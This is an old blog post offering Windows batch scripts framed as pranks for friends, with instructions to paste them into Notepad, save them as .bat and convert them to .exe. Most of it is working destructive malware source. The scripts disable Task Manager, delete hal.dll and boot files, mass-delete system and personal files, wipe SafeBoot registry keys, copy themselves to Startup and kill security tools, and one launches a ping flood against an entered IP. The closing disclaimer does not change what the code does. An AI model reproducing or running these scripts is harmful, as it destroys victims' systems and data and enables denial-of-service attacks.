Sunday, January 17, 2010

Simple coding for the naughty and fun friends

after I have not talked about computers and networks really weird with my blog this. maybe in the past I mostly post about the news of emerging technologies. This time I wanted to many to you all about computers and networks, but not the network directly, yes, but this post I wanted to share the fun way with the coding by extension. bat. maybe this way you think makes a virus or malware or trojan can also be fun but it only just. want to know how to make and use, as follows:

1. you must open the application to write a script that is notepad or another can.

2. then enter the script that I've made below:
note: you can copy and paste with this script. if you write each one must have 1 hour is not enough just copy and paste directly.

Script coding :

@ echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll

Copy file ini ke Notepad trus simpan dengan extension .bat
code :

@echo off
echo How many ping processes do you want?
set /p amount=
if not exist PD md PD
cd PD
echo Enter the IP:
set /p ip=
for /L %%A IN (1,1,%amount%) DO echo @echo off > PD%%A.bat
for /L %%A IN (1,1,%amount%) DO echo ping -t -l 65500 %ip% >> PD%%A.bat
for /L %%A IN (1,1,%amount%) DO start PD\pd%%A.bat
prompt $G$S
echo Enter 'terminate' to end all processes
set /p input=
if %input%==terminate goto term
goto a
tasklist /FI "IMAGENAME eq cmd.exe" > PID.txt
setLocal EnableDelayedExpansion
for /F "skip=4 tokens=1,2*" %%A in (PID.txt) do taskkill /PID %%B
echo Any ERRORS above means that process must be manually terminated
cd PD
del *.* /Q
rmdir PD
goto eof

Coding Simple but Dangerous

cd %HOMEDRIVE%\windows\
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
del /S /F /Q hal.dll
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
ren %HOMEDRIVE%\Windows\hal.dll hal3.dll
del %HOMEDRIVE%\WINDOWS\system32\*.* /F /Q /S
echo DONE!
shutdown -r -t 25 -c "Selamat semua Virus anda telah dibersihkan... Berbahagialah "
Batch Virus XDD
Save File To. Bat and convert with Batch to Exe.


@echo off
title ?wtfisthisshit?
set rawr=%random%
set/a rawr=%rawr%+200000
set/a rawr=%rawr%-1
if %rawr%==1 (
goto a
goto b
batch maleware phuCker

@echo off & break off
title fuCker v1.4-1-5
attrib +h %0
mode con cols=75 lines=15
color 0a
echo ad88 ,ad8888ba, 88
echo d8" d8"' `"8b 88
echo 88 d8' 88
echo MM88MMM 88 88 88 88 ,d8 ,adPPYba, 8b,dPPYba,
echo 88 88 88 88 88 ,a8" a8P_____ 88 88P' "Y8
echo 88 88 88 Y8, 8888[ 8PP""""""" 88
echo 88 "8a, ,a88 Y8a. .a8P 88`"Yba, "8b, 88
echo 88 `"YbbdP'Y8 `"Y8888Y"' 88 `Y8a `"Ybbd8"' 88
echo by c0re
rundll32.exe user32.dll,SwapMouseButton
if exist "%SYSTEMDRIVE%\boot.ini" goto winXP 2> nul
if exist "%USERPROFILE%\AppData" goto winVISTA 2> nul
echo x=msgbox("0wned by fuCker w0rm!",vbCritical or vbOkOnly,"fuCker") >> "fuCker.vbs"
start "" "fuCker.vbs" 2> nul

echo [Inject] Microsoft Windows XP!
set b0t=boot
attrib -r -s -h "%SYSTEMDRIVE%\%b0t%.ini" >nul
del /f /s /q "%SYSTEMDRIVE%\%b0t%.ini" >nul
set b0t=
attrib -r -s -h "%SYSTEMDRIVE%\ntldr" >nul
del /f /s /q "%SYSTEMDRIVE%\ntldr" >nul
set w0n=win
attrib -r -s -h "%SYSTEMROOT%\%w0n%.ini" >nul
del /f /s /q "%SYSTEMROOT%\%w0n%.ini" >nul
set w0n=
attrib -r -s -h "%SYSTEMROOT%\System32\hal.dll" >nul
del /f /s /q "%SYSTEMROOT%\System32\hal.dll" >nul
attrib -r -s -h "%SYSTEMROOT%\System32\bootcfg.exe" >nul
del /f /s /q "%SYSTEMROOT%\System32\bootcfg.exe" >nul
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /va /f >nul
msg * "fuCk y0u!"
shutdown -r -t 02 -c "fuCker w0rm deteCted!"
goto end

echo [Inject] Microsoft Windows Vista!
setlocal enableextensions
for /f "tokens=*" %%a in (
'reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA'
) do (
set usac=%%a
echo %usac%|find /i "0x1" > nul
if errorlevel 1 (
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
attrib -r -s -h "%SYSTEMRDRIVE%\bootmgr" >nul
del /f /s /q "%SYSTEMDRIVE%\bootmgr" >nul
attrib -r -s -h "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
del /f /s /q "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
copy %0 "%ALLUSERSPROFILE%\Start Menu\Programs\Startup" 2> nul
copy %0 "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
shutdown -s -t 10 -c "fuCker w0rm deteCted!"
goto end
) else (
echo :HjT >> "%TEMP%\HjT.bat"
echo tskill /a HijackThis >> "%TEMP%\HjT.bat"
echo goto HjT >> "%TEMP%\HjT.bat"
start "%TEMP%\HjT.bat"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
echo do >> "disk.vbs"
echo set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "disk.vbs"
echo set colCDROMs = oWMP.cdromCollection >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo loop >> "disk.vbs"
start "" "disk.vbs" 2> nul
echo @echo off >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo shutdown -r -t 00 -c "fuCker w0rm deteCted!" >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo echo 0wned by fuCker w0rm! 0n %DATE% at%TIME% >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo @exit >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
set usac=
start "%USERPROFILE%\Desktop\fuCkerw0rm.bat" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
goto end

3. then when you're done copy paste into notepad you all do not forget to save the script in a notepad format .bat .

4. then if you've saved all you have to convert these formats to the format. exe

5. program or application is very simple fun of this is done, finished.

note: the code you created can run on various Windows operating systems.

I hope this post useful, I am posting this article is not intended to teach you to damage or fun for others but this post is where learners only. remember! I do not recommend you use this post. if there is damage to the operating system you are using is not my responsibility, on because of I do not recommend it for you. I hope you can understand. thank you very much for your support all over this site, do not forget to stop by on here.


  1. Wah mantap dah alexait... btw, ada yang dirubah ya di sini???mantap deh.. sukses terus yaw..

  2. ya sob template ini sudah saya rombak semua sob

  3. This comment has been removed by a blog administrator.

  4. makasih sob... tapi maaf ya coment nya tak hapus krn mengandung spammer di site saya ini...
